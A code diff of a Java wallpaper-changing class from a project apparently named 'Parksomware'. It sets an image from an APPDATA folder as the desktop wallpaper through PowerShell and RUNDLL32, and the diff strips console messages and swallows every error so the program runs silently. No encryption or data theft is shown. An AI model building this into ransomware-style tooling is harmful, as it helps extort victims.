@@ -7,43 +7,54 @@ public class WallpaperChanger {
     private static final String PARKSOMWARE_DIR = System.getenv("APPDATA") + "\\Parksomware";
     private static final String BACKGROUND_IMAGE = "background.png";
 
-    public static void main() throws Exception {
-        Path parksomwarePath = Paths.get(PARKSOMWARE_DIR);
-        if (!Files.exists(parksomwarePath)) {
-            Files.createDirectories(parksomwarePath);
-        }
+    public static void main() {
+        try {
+            Path parksomwarePath = Paths.get(PARKSOMWARE_DIR);
+            if (!Files.exists(parksomwarePath)) {
+                Files.createDirectories(parksomwarePath);
+            }
 
-        Path backgroundPath = parksomwarePath.resolve(BACKGROUND_IMAGE);
+            Path backgroundPath = parksomwarePath.resolve(BACKGROUND_IMAGE);
+            waitForFileExistence(backgroundPath);
 
-        int attempts = 0;
-        while (!Files.exists(backgroundPath) && attempts < 10) {
-            Thread.sleep(500); // 0.5초 대기
-            attempts++;
-        }
-
-        if (Files.exists(backgroundPath)) {
-            setDesktopBackground(backgroundPath.toString());
-        } else {
-            System.out.println("배경 이미지 파일이 존재하지 않습니다: " + backgroundPath);
+            if (Files.exists(backgroundPath)) {
+                setDesktopBackground(backgroundPath.toString());
+            }
+        } catch (Exception ignored) {
         }
     }
 
+    private static void waitForFileExistence(Path filePath) throws InterruptedException {
+        int attempts = 0;
+        while (!Files.exists(filePath) && attempts < 10) {
+            Thread.sleep(500);
+            attempts++;
+        }
+    }
 
-    public static void setDesktopBackground(String imagePath) throws Exception {
+    public static void setDesktopBackground(String imagePath) {
         String command = "powershell.exe Set-ItemProperty -path 'HKCU:\\Control Panel\\Desktop' -name WallPaper -value '" + imagePath + "'";
 
-        Process powerShellProcess = Runtime.getRuntime().exec(command);
-        powerShellProcess.getOutputStream().close();
-
+        ProcessBuilder processBuilder = new ProcessBuilder("cmd.exe", "/c", command);
+        processBuilder.redirectErrorStream(true);
         try {
-            powerShellProcess.waitFor();
-        } catch (InterruptedException e) {
-            e.printStackTrace();
+            Process process = processBuilder.start();
+
+            int exitCode = process.waitFor();
+            if (exitCode == 0) {
+                applyChanges();
+            }
+        } catch (Exception ignored) {
         }
+    }
 
-        System.out.println("Exit Status: " + powerShellProcess.exitValue());
-
-        // Apply changes
-        Runtime.getRuntime().exec("RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters");
+    private static void applyChanges() {
+        ProcessBuilder processBuilder = new ProcessBuilder("RUNDLL32.EXE", "user32.dll,UpdatePerUserSystemParameters");
+        processBuilder.redirectErrorStream(true);
+        try {
+            Process process = processBuilder.start();
+            process.waitFor();
+        } catch (Exception ignored) {
+        }
     }
 }
